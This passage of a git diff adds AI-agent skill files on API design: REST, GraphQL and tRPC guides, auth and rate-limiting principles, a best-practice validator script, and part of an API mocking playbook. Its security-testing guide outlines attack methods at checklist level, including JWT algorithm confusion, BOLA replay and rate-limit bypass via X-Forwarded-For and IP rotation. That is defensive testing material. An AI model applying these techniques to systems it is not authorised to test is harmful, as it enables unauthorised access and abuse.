+│ └── REST + OpenAPI (widest compatibility)
+│
+├── Complex data needs / Multiple frontends
+│ └── GraphQL (flexible queries)
+│
+├── TypeScript frontend + backend (monorepo)
+│ └── tRPC (end-to-end type safety)
+│
+├── Real-time / Event-driven
+│ └── WebSocket + AsyncAPI
+│
+└── Internal microservices
+ └── gRPC (performance) or REST (simplicity)
+```
+
+## Comparison
+
+| Factor | REST | GraphQL | tRPC |
+|--------|------|---------|------|
+| **Best for** | Public APIs | Complex apps | TS monorepos |
+| **Learning curve** | Low | Medium | Low (if TS) |
+| **Over/under fetching** | Common | Solved | Solved |
+| **Type safety** | Manual (OpenAPI) | Schema-based | Automatic |
+| **Caching** | HTTP native | Complex | Client-based |
+
+## Selection Questions
+
+1. Who are the API consumers?
+2. Is the frontend TypeScript?
+3. How complex are the data relationships?
+4. Is caching critical?
+5. Public or internal API?
diff --git a/web-app/public/skills/api-patterns/auth.md b/web-app/public/skills/api-patterns/auth.md
new file mode 100644
index 00000000..c04030d3
--- /dev/null
+++ b/web-app/public/skills/api-patterns/auth.md
@@ -0,0 +1,24 @@
+# Authentication Patterns
+
+> Choose auth pattern based on use case.
+
+## Selection Guide
+
+| Pattern | Best For |
+|---------|----------|
+| **JWT** | Stateless, microservices |
+| **Session** | Traditional web, simple |
+| **OAuth 2.0** | Third-party integration |
+| **API Keys** | Server-to-server, public APIs |
+| **Passkey** | Modern passwordless (2025+) |
+
+## JWT Principles
+
+```
+Important:
+├── Always verify signature
+├── Check expiration
+├── Include minimal claims
+├── Use short expiry + refresh tokens
+└── Never store sensitive data in JWT
+```
diff --git a/web-app/public/skills/api-patterns/documentation.md b/web-app/public/skills/api-patterns/documentation.md
new file mode 100644
index 00000000..5e199da0
--- /dev/null
+++ b/web-app/public/skills/api-patterns/documentation.md
@@ -0,0 +1,26 @@
+# API Documentation Principles
+
+> Good docs = happy developers = API adoption.
+
+## OpenAPI/Swagger Essentials
+
+```
+Include:
+├── All endpoints with examples
+├── Request/response schemas
+├── Authentication requirements
+├── Error response formats
+└── Rate limiting info
+```
+
+## Good Documentation Has
+
+```
+Essentials:
+├── Quick start / Getting started
+├── Authentication guide
+├── Complete API reference
+├── Error handling guide
+├── Code examples (multiple languages)
+└── Changelog
+```
diff --git a/web-app/public/skills/api-patterns/graphql.md b/web-app/public/skills/api-patterns/graphql.md
new file mode 100644
index 00000000..1e5632ce
--- /dev/null
+++ b/web-app/public/skills/api-patterns/graphql.md
@@ -0,0 +1,41 @@
+# GraphQL Principles
+
+> Flexible queries for complex, interconnected data.
+
+## When to Use
+
+```
+✅ Good fit:
+├── Complex, interconnected data
+├── Multiple frontend platforms
+├── Clients need flexible queries
+├── Evolving data requirements
+└── Reducing over-fetching matters
+
+❌ Poor fit:
+├── Simple CRUD operations
+├── File upload heavy
+├── HTTP caching important
+└── Team unfamiliar with GraphQL
+```
+
+## Schema Design Principles
+
+```
+Principles:
+├── Think in graphs, not endpoints
+├── Design for evolvability (no versions)
+├── Use connections for pagination
+├── Be specific with types (not generic "data")
+└── Handle nullability thoughtfully
+```
+
+## Security Considerations
+
+```
+Protect against:
+├── Query depth attacks → Set max depth
+├── Query complexity → Calculate cost
+├── Batching abuse → Limit batch size
+├── Introspection → Disable in production
+```
diff --git a/web-app/public/skills/api-patterns/rate-limiting.md b/web-app/public/skills/api-patterns/rate-limiting.md
new file mode 100644
index 00000000..cffaa290
--- /dev/null
+++ b/web-app/public/skills/api-patterns/rate-limiting.md
@@ -0,0 +1,31 @@
+# Rate Limiting Principles
+
+> Protect your API from abuse and overload.
+
+## Why Rate Limit
+
+```
+Protect against:
+├── Brute force attacks
+├── Resource exhaustion
+├── Cost overruns (if pay-per-use)
+└── Unfair usage
+```
+
+## Strategy Selection
+
+| Type | How | When |
+|------|-----|------|
+| **Token bucket** | Burst allowed, refills over time | Most APIs |
+| **Sliding window** | Smooth distribution | Strict limits |
+| **Fixed window** | Simple counters per window | Basic needs |
+
+## Response Headers
+
+```
+Include in headers:
+├── X-RateLimit-Limit (max requests)
+├── X-RateLimit-Remaining (requests left)
+├── X-RateLimit-Reset (when limit resets)
+└── Return 429 when exceeded
+```
diff --git a/web-app/public/skills/api-patterns/response.md b/web-app/public/skills/api-patterns/response.md
new file mode 100644
index 00000000..3c6ab141
--- /dev/null
+++ b/web-app/public/skills/api-patterns/response.md
@@ -0,0 +1,37 @@
+# Response Format Principles
+
+> Consistency is key - choose a format and stick to it.
+
+## Common Patterns
+
+```
+Choose one:
+├── Envelope pattern ({ success, data, error })
+├── Direct data (just return the resource)
+└── HAL/JSON:API (hypermedia)
+```
+
+## Error Response
+
+```
+Include:
+├── Error code (for programmatic handling)
+├── User message (for display)
+├── Details (for debugging, field-level errors)
+├── Request ID (for support)
+└── NOT internal details (security!)
+```
+
+## Pagination Types
+
+| Type | Best For | Trade-offs |
+|------|----------|------------|
+| **Offset** | Simple, jumpable | Performance on large datasets |
+| **Cursor** | Large datasets | Can't jump to page |
+| **Keyset** | Performance critical | Requires sortable key |
+
+### Selection Questions
+
+1. How large is the dataset?
+2. Do users need to jump to specific pages?
+3. Is data frequently changing?
diff --git a/web-app/public/skills/api-patterns/rest.md b/web-app/public/skills/api-patterns/rest.md
new file mode 100644
index 00000000..c04aa7ca
--- /dev/null
+++ b/web-app/public/skills/api-patterns/rest.md
@@ -0,0 +1,40 @@
+# REST Principles
+
+> Resource-based API design - nouns not verbs.
+
+## Resource Naming Rules
+
+```
+Principles:
+├── Use NOUNS, not verbs (resources, not actions)
+├── Use PLURAL forms (/users not /user)
+├── Use lowercase with hyphens (/user-profiles)
+├── Nest for relationships (/users/123/posts)
+└── Keep shallow (max 3 levels deep)
+```
+
+## HTTP Method Selection
+
+| Method | Purpose | Idempotent? | Body? |
+|--------|---------|-------------|-------|
+| **GET** | Read resource(s) | Yes | No |
+| **POST** | Create new resource | No | Yes |
+| **PUT** | Replace entire resource | Yes | Yes |
+| **PATCH** | Partial update | No | Yes |
+| **DELETE** | Remove resource | Yes | No |
+
+## Status Code Selection
+
+| Situation | Code | Why |
+|-----------|------|-----|
+| Success (read) | 200 | Standard success |
+| Created | 201 | New resource created |
+| No content | 204 | Success, nothing to return |
+| Bad request | 400 | Malformed request |
+| Unauthorized | 401 | Missing/invalid auth |
+| Forbidden | 403 | Valid auth, no permission |
+| Not found | 404 | Resource doesn't exist |
+| Conflict | 409 | State conflict (duplicate) |
+| Validation error | 422 | Valid syntax, invalid data |
+| Rate limited | 429 | Too many requests |
+| Server error | 500 | Our fault |
diff --git a/web-app/public/skills/api-patterns/scripts/api_validator.py b/web-app/public/skills/api-patterns/scripts/api_validator.py
new file mode 100644
index 00000000..930db829
--- /dev/null
+++ b/web-app/public/skills/api-patterns/scripts/api_validator.py
@@ -0,0 +1,211 @@
+#!/usr/bin/env python3
+"""
+API Validator - Checks API endpoints for best practices.
+Validates OpenAPI specs, response formats, and common issues.
+"""
+import sys
+import json
+import re
+from pathlib import Path
+
+# Fix Windows console encoding for Unicode output
+try:
+ sys.stdout.reconfigure(encoding='utf-8', errors='replace')
+ sys.stderr.reconfigure(encoding='utf-8', errors='replace')
+except AttributeError:
+ pass # Python < 3.7
+
+def find_api_files(project_path: Path) -> list:
+ """Find API-related files."""
+ patterns = [
+ "**/*api*.ts", "**/*api*.js", "**/*api*.py",
+ "**/routes/*.ts", "**/routes/*.js", "**/routes/*.py",
+ "**/controllers/*.ts", "**/controllers/*.js",
+ "**/endpoints/*.ts", "**/endpoints/*.py",
+ "**/*.openapi.json", "**/*.openapi.yaml",
+ "**/swagger.json", "**/swagger.yaml",
+ "**/openapi.json", "**/openapi.yaml"
+ ]
+
+ files = []
+ for pattern in patterns:
+ files.extend(project_path.glob(pattern))
+
+ # Exclude node_modules, etc.
+ return [f for f in files if not any(x in str(f) for x in ['node_modules', '.git', 'dist', 'build', '__pycache__'])]
+
+def check_openapi_spec(file_path: Path) -> dict:
+ """Check OpenAPI/Swagger specification."""
+ issues = []
+ passed = []
+
+ try:
+ content = file_path.read_text(encoding='utf-8')
+
+ if file_path.suffix == '.json':
+ spec = json.loads(content)
+ else:
+ # Basic YAML check
+ if 'openapi:' in content or 'swagger:' in content:
+ passed.append("[OK] OpenAPI/Swagger version defined")
+ else:
+ issues.append("[X] No OpenAPI version found")
+
+ if 'paths:' in content:
+ passed.append("[OK] Paths section exists")
+ else:
+ issues.append("[X] No paths defined")
+
+ if 'components:' in content or 'definitions:' in content:
+ passed.append("[OK] Schema components defined")
+
+ return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'openapi'}
+
+ # JSON OpenAPI checks
+ if 'openapi' in spec or 'swagger' in spec:
+ passed.append("[OK] OpenAPI version defined")
+
+ if 'info' in spec:
+ if 'title' in spec['info']:
+ passed.append("[OK] API title defined")
+ if 'version' in spec['info']:
+ passed.append("[OK] API version defined")
+ if 'description' not in spec['info']:
+ issues.append("[!] API description missing")
+
+ if 'paths' in spec:
+ path_count = len(spec['paths'])
+ passed.append(f"[OK] {path_count} endpoints defined")
+
+ # Check each path
+ for path, methods in spec['paths'].items():
+ for method, details in methods.items():
+ if method in ['get', 'post', 'put', 'patch', 'delete']:
+ if 'responses' not in details:
+ issues.append(f"[X] {method.upper()} {path}: No responses defined")
+ if 'summary' not in details and 'description' not in details:
+ issues.append(f"[!] {method.upper()} {path}: No description")
+
+ except Exception as e:
+ issues.append(f"[X] Parse error: {e}")
+
+ return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'openapi'}
+
+def check_api_code(file_path: Path) -> dict:
+ """Check API code for common issues."""
+ issues = []
+ passed = []
+
+ try:
+ content = file_path.read_text(encoding='utf-8')
+
+ # Check for error handling
+ error_patterns = [
+ r'try\s*{', r'try:', r'\.catch\(',
+ r'except\s+', r'catch\s*\('
+ ]
+ has_error_handling = any(re.search(p, content) for p in error_patterns)
+ if has_error_handling:
+ passed.append("[OK] Error handling present")
+ else:
+ issues.append("[X] No error handling found")
+
+ # Check for status codes
+ status_patterns = [
+ r'status\s*\(\s*\d{3}\s*\)', r'statusCode\s*[=:]\s*\d{3}',
+ r'HttpStatus\.', r'status_code\s*=\s*\d{3}',
+ r'\.status\(\d{3}\)', r'res\.status\('
+ ]
+ has_status = any(re.search(p, content) for p in status_patterns)
+ if has_status:
+ passed.append("[OK] HTTP status codes used")
+ else:
+ issues.append("[!] No explicit HTTP status codes")
+
+ # Check for validation
+ validation_patterns = [
+ r'validate', r'schema', r'zod', r'joi', r'yup',
+ r'pydantic', r'@Body\(', r'@Query\('
+ ]
+ has_validation = any(re.search(p, content, re.I) for p in validation_patterns)
+ if has_validation:
+ passed.append("[OK] Input validation present")
+ else:
+ issues.append("[!] No input validation detected")
+
+ # Check for auth middleware
+ auth_patterns = [
+ r'auth', r'jwt', r'bearer', r'token',
+ r'middleware', r'guard', r'@Authenticated'
+ ]
+ has_auth = any(re.search(p, content, re.I) for p in auth_patterns)
+ if has_auth:
+ passed.append("[OK] Authentication/authorization detected")
+
+ # Check for rate limiting
+ rate_patterns = [r'rateLimit', r'throttle', r'rate.?limit']
+ has_rate = any(re.search(p, content, re.I) for p in rate_patterns)
+ if has_rate:
+ passed.append("[OK] Rate limiting present")
+
+ # Check for logging
+ log_patterns = [r'console\.log', r'logger\.', r'logging\.', r'log\.']
+ has_logging = any(re.search(p, content) for p in log_patterns)
+ if has_logging:
+ passed.append("[OK] Logging present")
+
+ except Exception as e:
+ issues.append(f"[X] Read error: {e}")
+
+ return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'code'}
+
+def main():
+ target = sys.argv[1] if len(sys.argv) > 1 else "."
+ project_path = Path(target)
+
+ print("\n" + "=" * 60)
+ print(" API VALIDATOR - Endpoint Best Practices Check")
+ print("=" * 60 + "\n")
+
+ api_files = find_api_files(project_path)
+
+ if not api_files:
+ print("[!] No API files found.")
+ print(" Looking for: routes/, controllers/, api/, openapi.json/yaml")
+ sys.exit(0)
+
+ results = []
+ for file_path in api_files[:15]: # Limit
+ if 'openapi' in file_path.name.lower() or 'swagger' in file_path.name.lower():
+ result = check_openapi_spec(file_path)
+ else:
+ result = check_api_code(file_path)
+ results.append(result)
+
+ # Print results
+ total_issues = 0
+ total_passed = 0
+
+ for result in results:
+ print(f"\n[FILE] {result['file']} [{result['type']}]")
+ for item in result['passed']:
+ print(f" {item}")
+ total_passed += 1
+ for item in result['issues']:
+ print(f" {item}")
+ if item.startswith("[X]"):
+ total_issues += 1
+
+ print("\n" + "=" * 60)
+ print(f"[RESULTS] {total_passed} passed, {total_issues} critical issues")
+ print("=" * 60)
+
+ if total_issues == 0:
+ print("[OK] API validation passed")
+ sys.exit(0)
+ else:
+ print("[X] Fix critical issues before deployment")
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
diff --git a/web-app/public/skills/api-patterns/security-testing.md b/web-app/public/skills/api-patterns/security-testing.md
new file mode 100644
index 00000000..265023fa
--- /dev/null
+++ b/web-app/public/skills/api-patterns/security-testing.md
@@ -0,0 +1,122 @@
+# API Security Testing
+
+> Principles for testing API security. OWASP API Top 10, authentication, authorization testing.
+
+---
+
+## OWASP API Security Top 10
+
+| Vulnerability | Test Focus |
+|---------------|------------|
+| **API1: BOLA** | Access other users' resources |
+| **API2: Broken Auth** | JWT, session, credentials |
+| **API3: Property Auth** | Mass assignment, data exposure |
+| **API4: Resource Consumption** | Rate limiting, DoS |
+| **API5: Function Auth** | Admin endpoints, role bypass |
+| **API6: Business Flow** | Logic abuse, automation |
+| **API7: SSRF** | Internal network access |
+| **API8: Misconfiguration** | Debug endpoints, CORS |
+| **API9: Inventory** | Shadow APIs, old versions |
+| **API10: Unsafe Consumption** | Third-party API trust |
+
+---
+
+## Authentication Testing
+
+### JWT Testing
+
+| Check | What to Test |
+|-------|--------------|
+| Algorithm | None, algorithm confusion |
+| Secret | Weak secrets, brute force |
+| Claims | Expiration, issuer, audience |
+| Signature | Manipulation, key injection |
+
+### Session Testing
+
+| Check | What to Test |
+|-------|--------------|
+| Generation | Predictability |
+| Storage | Client-side security |
+| Expiration | Timeout enforcement |
+| Invalidation | Logout effectiveness |
+
+---
+
+## Authorization Testing
+
+| Test Type | Approach |
+|-----------|----------|
+| **Horizontal** | Access peer users' data |
+| **Vertical** | Access higher privilege functions |
+| **Context** | Access outside allowed scope |
+
+### BOLA/IDOR Testing
+
+1. Identify resource IDs in requests
+2. Capture request with user A's session
+3. Replay with user B's session
+4. Check for unauthorized access
+
+---
+
+## Input Validation Testing
+
+| Injection Type | Test Focus |
+|----------------|------------|
+| SQL | Query manipulation |
+| NoSQL | Document queries |
+| Command | System commands |
+| LDAP | Directory queries |
+
+**Approach:** Test all parameters, try type coercion, test boundaries, check error messages.
+
+---
+
+## Rate Limiting Testing
+
+| Aspect | Check |
+|--------|-------|
+| Existence | Is there any limit? |
+| Bypass | Headers, IP rotation |
+| Scope | Per-user, per-IP, global |
+
+**Bypass techniques:** X-Forwarded-For, different HTTP methods, case variations, API versioning.
+
+---
+
+## GraphQL Security
+
+| Test | Focus |
+|------|-------|
+| Introspection | Schema disclosure |
+| Batching | Query DoS |
+| Nesting | Depth-based DoS |
+| Authorization | Field-level access |
+
+---
+
+## Security Testing Checklist
+
+**Authentication:**
+- [ ] Test for bypass
+- [ ] Check credential strength
+- [ ] Verify token security
+
+**Authorization:**
+- [ ] Test BOLA/IDOR
+- [ ] Check privilege escalation
+- [ ] Verify function access
+
+**Input:**
+- [ ] Test all parameters
+- [ ] Check for injection
+
+**Config:**
+- [ ] Check CORS
+- [ ] Verify headers
+- [ ] Test error handling
+
+---
+
+> **Remember:** APIs are the backbone of modern apps. Test them like attackers will.
diff --git a/web-app/public/skills/api-patterns/trpc.md b/web-app/public/skills/api-patterns/trpc.md
new file mode 100644
index 00000000..10976866
--- /dev/null
+++ b/web-app/public/skills/api-patterns/trpc.md
@@ -0,0 +1,41 @@
+# tRPC Principles
+
+> End-to-end type safety for TypeScript monorepos.
+
+## When to Use
+
+```
+✅ Perfect fit:
+├── TypeScript on both ends
+├── Monorepo structure
+├── Internal tools
+├── Rapid development
+└── Type safety critical
+
+❌ Poor fit:
+├── Non-TypeScript clients
+├── Public API
+├── Need REST conventions
+└── Multiple language backends
+```
+
+## Key Benefits
+
+```
+Why tRPC:
+├── Zero schema maintenance
+├── End-to-end type inference
+├── IDE autocomplete across stack
+├── Instant API changes reflected
+└── No code generation step
+```
+
+## Integration Patterns
+
+```
+Common setups:
+├── Next.js + tRPC (most common)
+├── Monorepo with shared types
+├── Remix + tRPC
+└── Any TS frontend + backend
+```
diff --git a/web-app/public/skills/api-patterns/versioning.md b/web-app/public/skills/api-patterns/versioning.md
new file mode 100644
index 00000000..5ead01b2
--- /dev/null
+++ b/web-app/public/skills/api-patterns/versioning.md
@@ -0,0 +1,22 @@
+# Versioning Strategies
+
+> Plan for API evolution from day one.
+
+## Decision Factors
+
+| Strategy | Implementation | Trade-offs |
+|----------|---------------|------------|
+| **URI** | /v1/users | Clear, easy caching |
+| **Header** | Accept-Version: 1 | Cleaner URLs, harder discovery |
+| **Query** | ?version=1 | Easy to add, messy |
+| **None** | Evolve carefully | Best for internal, risky for public |
+
+## Versioning Philosophy
+
+```
+Consider:
+├── Public API? → Version in URI
+├── Internal only? → May not need versioning
+├── GraphQL? → Typically no versions (evolve schema)
+├── tRPC? → Types enforce compatibility
+```
diff --git a/web-app/public/skills/api-security-best-practices/SKILL.md b/web-app/public/skills/api-security-best-practices/SKILL.md
index 6d8f1783..f19ff6fe 100644
--- a/web-app/public/skills/api-security-best-practices/SKILL.md
+++ b/web-app/public/skills/api-security-best-practices/SKILL.md
@@ -3,6 +3,7 @@ name: api-security-best-practices
description: "Implement secure API design patterns including authentication, authorization, input validation, rate limiting, and protection against common API vulnerabilities"
risk: unknown
source: community
+date_added: "2026-02-27"
---
# API Security Best Practices
diff --git a/web-app/public/skills/api-security-testing/SKILL.md b/web-app/public/skills/api-security-testing/SKILL.md
index f8999350..a24d95c0 100644
--- a/web-app/public/skills/api-security-testing/SKILL.md
+++ b/web-app/public/skills/api-security-testing/SKILL.md
@@ -1,11 +1,10 @@
---
name: api-security-testing
description: "API security testing workflow for REST and GraphQL APIs covering authentication, authorization, rate limiting, input validation, and security best practices."
-source: personal
-risk: safe
-domain: security
category: granular-workflow-bundle
-version: 1.0.0
+risk: safe
+source: personal
+date_added: "2026-02-27"
---
# API Security Testing Workflow
diff --git a/web-app/public/skills/api-testing-observability-api-mock/SKILL.md b/web-app/public/skills/api-testing-observability-api-mock/SKILL.md
index b8c42d36..d2724a86 100644
--- a/web-app/public/skills/api-testing-observability-api-mock/SKILL.md
+++ b/web-app/public/skills/api-testing-observability-api-mock/SKILL.md
@@ -3,6 +3,7 @@ name: api-testing-observability-api-mock
description: "You are an API mocking expert specializing in realistic mock services for development, testing, and demos. Design mocks that simulate real API behavior and enable parallel development."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# API Mocking Framework
diff --git a/web-app/public/skills/api-testing-observability-api-mock/resources/implementation-playbook.md b/web-app/public/skills/api-testing-observability-api-mock/resources/implementation-playbook.md
new file mode 100644
index 00000000..514c02d4
--- /dev/null
+++ b/web-app/public/skills/api-testing-observability-api-mock/resources/implementation-playbook.md
@@ -0,0 +1,1327 @@
+# API Mocking Implementation Playbook
+
+This file contains detailed patterns, checklists, and code samples referenced by the skill.
+
+## Detailed Steps
+
+### 1. Mock Server Setup
+
+Create comprehensive mock server infrastructure:
+
+**Mock Server Framework**
+
+```python
+from typing import Dict, List, Any, Optional
+import json
+import asyncio
+from datetime import datetime
+from fastapi import FastAPI, Request, Response
+import uvicorn
+
+class MockAPIServer:
+ def __init__(self, config: Dict[str, Any]):
+ self.app = FastAPI(title="Mock API Server")
+ self.routes = {}
+ self.middleware = []
+ self.state_manager = StateManager()
+ self.scenario_manager = ScenarioManager()
+
+ def setup_mock_server(self):
+ """Setup comprehensive mock server"""
+ # Configure middleware
+ self._setup_middleware()
+
+ # Load mock definitions
+ self._load_mock_definitions()
+
+ # Setup dynamic routes
+ self._setup_dynamic_routes()
+
+ # Initialize scenarios
+ self._initialize_scenarios()
+
+ return self.app
+
+ def _setup_middleware(self):
+ """Configure server middleware"""
+ @self.app.middleware("http")
+ async def add_mock_headers(request: Request, call_next):
+ response = await call_next(request)
+ response.headers["X-Mock-Server"] = "true"
+ response.headers["X-Mock-Scenario"] = self.scenario_manager.current_scenario
+ return response
+
+ @self.app.middleware("http")
+ async def simulate_latency(request: Request, call_next):
+ # Simulate network latency
+ latency = self._calculate_latency(request.url.path)
+ await asyncio.sleep(latency / 1000) # Convert to seconds
+ response = await call_next(request)
+ return response
+
+ @self.app.middleware("http")
+ async def track_requests(request: Request, call_next):
+ # Track request for verification
+ self.state_manager.track_request({
+ 'method': request.method,
+ 'path': str(request.url.path),
+ 'headers': dict(request.headers),
+ 'timestamp': datetime.now()
+ })
+ response = await call_next(request)
+ return response
+
+ def _setup_dynamic_routes(self):
+ """Setup dynamic route handling"""
+ @self.app.api_route("/{path:path}", methods=["GET", "POST", "PUT", "DELETE", "PATCH"])
+ async def handle_mock_request(path: str, request: Request):
+ # Find matching mock
+ mock = self._find_matching_mock(request.method, path, request)
+
+ if not mock:
+ return Response(
+ content=json.dumps({"error": "No mock found for this endpoint"}),
+ status_code=404,
+ media_type="application/json"
+ )
+
+ # Process mock response
+ response_data = await self._process_mock_response(mock, request)
+
+ return Response(
+ content=json.dumps(response_data['body']),
+ status_code=response_data['status'],
+ headers=response_data['headers'],
+ media_type="application/json"
+ )
+
+ async def _process_mock_response(self, mock: Dict[str, Any], request: Request):
+ """Process and generate mock response"""
+ # Check for conditional responses
+ if mock.get('conditions'):
+ for condition in mock['conditions']:
+ if self._evaluate_condition(condition, request):
+ return await self._generate_response(condition['response'], request)
+
+ # Use default response
+ return await self._generate_response(mock['response'], request)
+
+ def _generate_response(self, response_template: Dict[str, Any], request: Request):
+ """Generate response from template"""
+ response = {
+ 'status': response_template.get('status', 200),
+ 'headers': response_template.get('headers', {}),
+ 'body': self._process_response_body(response_template['body'], request)
+ }
+
+ # Apply response transformations
+ if response_template.get('transformations'):
+ response = self._apply_transformations(response, response_template['transformations'])
+
+ return response
+```
+
+### 2. Request/Response Stubbing
+
+Implement flexible stubbing system:
+
+**Stubbing Engine**
+
+```python
+class StubbingEngine:
+ def __init__(self):
+ self.stubs = {}
+ self.matchers = self._initialize_matchers()
+
+ def create_stub(self, method: str, path: str, **kwargs):
+ """Create a new stub"""
+ stub_id = self._generate_stub_id()
+
+ stub = {
+ 'id': stub_id,
+ 'method': method,
+ 'path': path,
+ 'matchers': self._build_matchers(kwargs),
+ 'response': kwargs.get('response', {}),
+ 'priority': kwargs.get('priority', 0),
+ 'times': kwargs.get('times', -1), # -1 for unlimited
+ 'delay': kwargs.get('delay', 0),
+ 'scenario': kwargs.get('scenario', 'default')
+ }
+
+ self.stubs[stub_id] = stub
+ return stub_id
+
+ def _build_matchers(self, kwargs):
+ """Build request matchers"""
+ matchers = []
+
+ # Path parameter matching
+ if 'path_params' in kwargs:
+ matchers.append({
+ 'type': 'path_params',
+ 'params': kwargs['path_params']
+ })
+
+ # Query parameter matching
+ if 'query_params' in kwargs:
+ matchers.append({
+ 'type': 'query_params',
+ 'params': kwargs['query_params']
+ })
+
+ # Header matching
+ if 'headers' in kwargs:
+ matchers.append({
+ 'type': 'headers',
+ 'headers': kwargs['headers']
+ })
+
+ # Body matching
+ if 'body' in kwargs:
+ matchers.append({
+ 'type': 'body',
+ 'body': kwargs['body'],
+ 'match_type': kwargs.get('body_match_type', 'exact')
+ })
+
+ return matchers
+
+ def match_request(self, request: Dict[str, Any]):
+ """Find matching stub for request"""
+ candidates = []
+
+ for stub in self.stubs.values():
+ if self._matches_stub(request, stub):
+ candidates.append(stub)
+
+ # Sort by priority and return best match
+ if candidates:
+ return sorted(candidates, key=lambda x: x['priority'], reverse=True)[0]
+
+ return None
+
+ def _matches_stub(self, request: Dict[str, Any], stub: Dict[str, Any]):
+ """Check if request matches stub"""
+ # Check method
+ if request['method'] != stub['method']:
+ return False
+
+ # Check path
+ if not self._matches_path(request['path'], stub['path']):
+ return False
+
+ # Check all matchers
+ for matcher in stub['matchers']:
+ if not self._evaluate_matcher(request, matcher):
+ return False
+
+ # Check if stub is still valid
+ if stub['times'] == 0:
+ return False
+
+ return True
+
+ def create_dynamic_stub(self):
+ """Create dynamic stub with callbacks"""
+ return '''
+class DynamicStub:
+ def __init__(self, path_pattern: str):
+ self.path_pattern = path_pattern
+ self.response_generator = None
+ self.state_modifier = None
+
+ def with_response_generator(self, generator):
+ """Set dynamic response generator"""
+ self.response_generator = generator
+ return self
+
+ def with_state_modifier(self, modifier):
+ """Set state modification callback"""
+ self.state_modifier = modifier
+ return self
+
+ async def process_request(self, request: Request, state: Dict[str, Any]):
+ """Process request dynamically"""
+ # Extract request data
+ request_data = {
+ 'method': request.method,
+ 'path': request.url.path,
+ 'headers': dict(request.headers),
+ 'query_params': dict(request.query_params),
+ 'body': await request.json() if request.method in ['POST', 'PUT'] else None
+ }
+
+ # Modify state if needed
+ if self.state_modifier:
+ state = self.state_modifier(state, request_data)
+
+ # Generate response
+ if self.response_generator:
+ response = self.response_generator(request_data, state)
+ else:
+ response = {'status': 200, 'body': {}}
+
+ return response, state
+
+# Usage example
+dynamic_stub = DynamicStub('/api/users/{user_id}')
+dynamic_stub.with_response_generator(lambda req, state: {
+ 'status': 200,
+ 'body': {
+ 'id': req['path_params']['user_id'],
+ 'name': state.get('users', {}).get(req['path_params']['user_id'], 'Unknown'),
+ 'request_count': state.get('request_count', 0)
+ }
+}).with_state_modifier(lambda state, req: {
+ **state,
+ 'request_count': state.get('request_count', 0) + 1
+})
+'''
+```
+
+### 3. Dynamic Data Generation
+
+Generate realistic mock data:
+
+**Mock Data Generator**
+
+```python
+from faker import Faker
+import random
+from datetime import datetime, timedelta
+
+class MockDataGenerator:
+ def __init__(self):
+ self.faker = Faker()
+ self.templates = {}
+ self.generators = self._init_generators()
+
+ def generate_data(self, schema: Dict[str, Any]):
+ """Generate data based on schema"""
+ if isinstance(schema, dict):
+ if '$ref' in schema:
+ # Reference to another schema
+ return self.generate_data(self.resolve_ref(schema['$ref']))
+
+ result = {}
+ for key, value in schema.items():
+ if key.startswith('$'):
+ continue
+ result[key] = self._generate_field(value)
+ return result
+
+ elif isinstance(schema, list):
+ # Generate array
+ count = random.randint(1, 10)
+ return [self.generate_data(schema[0]) for _ in range(count)]
+
+ else:
+ return schema
+
+ def _generate_field(self, field_schema: Dict[str, Any]):
+ """Generate field value based on schema"""
+ field_type = field_schema.get('type', 'string')
+
+ # Check for custom generator
+ if 'generator' in field_schema:
+ return self._use_custom_generator(field_schema['generator'])
+
+ # Check for enum
+ if 'enum' in field_schema:
+ return random.choice(field_schema['enum'])
+
+ # Generate based on type
+ generators = {
+ 'string': self._generate_string,
+ 'number': self._generate_number,
+ 'integer': self._generate_integer,
+ 'boolean': self._generate_boolean,
+ 'array': self._generate_array,
+ 'object': lambda s: self.generate_data(s)
+ }
+
+ generator = generators.get(field_type, self._generate_string)
+ return generator(field_schema)
+
+ def _generate_string(self, schema: Dict[str, Any]):
+ """Generate string value"""
+ # Check for format
+ format_type = schema.get('format', '')
+
+ format_generators = {
+ 'email': self.faker.email,
+ 'name': self.faker.name,
+ 'first_name': self.faker.first_name,
+ 'last_name': self.faker.last_name,
+ 'phone': self.faker.phone_number,
+ 'address': self.faker.address,
+ 'url': self.faker.url,
+ 'uuid': self.faker.uuid4,
+ 'date': lambda: self.faker.date().isoformat(),
+ 'datetime': lambda: self.faker.date_time().isoformat(),
+ 'password': lambda: self.faker.password()
+ }
+
+ if format_type in format_generators:
+ return format_generators[format_type]()
+
+ # Check for pattern
+ if 'pattern' in schema:
+ return self._generate_from_pattern(schema['pattern'])
+
+ # Default string generation
+ min_length = schema.get('minLength', 5)
+ max_length = schema.get('maxLength', 20)
+ return self.faker.text(max_nb_chars=random.randint(min_length, max_length))
+
+ def create_data_templates(self):
+ """Create reusable data templates"""
+ return {
+ 'user': {
+ 'id': {'type': 'string', 'format': 'uuid'},
+ 'username': {'type': 'string', 'generator': 'username'},
+ 'email': {'type': 'string', 'format': 'email'},
+ 'profile': {
+ 'type': 'object',
+ 'properties': {
+ 'firstName': {'type': 'string', 'format': 'first_name'},
+ 'lastName': {'type': 'string', 'format': 'last_name'},
+ 'avatar': {'type': 'string', 'format': 'url'},
+ 'bio': {'type': 'string', 'maxLength': 200}
+ }
+ },
+ 'createdAt': {'type': 'string', 'format': 'datetime'},
+ 'status': {'type': 'string', 'enum': ['active', 'inactive', 'suspended']}
+ },
+ 'product': {
+ 'id': {'type': 'string', 'format': 'uuid'},
+ 'name': {'type': 'string', 'generator': 'product_name'},
+ 'description': {'type': 'string', 'maxLength': 500},
+ 'price': {'type': 'number', 'minimum': 0.01, 'maximum': 9999.99},
+ 'category': {'type': 'string', 'enum': ['electronics', 'clothing', 'food', 'books']},
+ 'inStock': {'type': 'boolean'},
+ 'rating': {'type': 'number', 'minimum': 0, 'maximum': 5}
+ }
+ }
+
+ def generate_relational_data(self):
+ """Generate data with relationships"""
+ return '''
+class RelationalDataGenerator:
+ def generate_related_entities(self, schema: Dict[str, Any], count: int):
+ """Generate related entities maintaining referential integrity"""
+ entities = {}
+
+ # First pass: generate primary entities
+ for entity_name, entity_schema in schema['entities'].items():
+ entities[entity_name] = []
+ for i in range(count):
+ entity = self.generate_entity(entity_schema)
+ entity['id'] = f"{entity_name}_{i}"
+ entities[entity_name].append(entity)
+
+ # Second pass: establish relationships
+ for relationship in schema.get('relationships', []):
+ self.establish_relationship(entities, relationship)
+
+ return entities
+
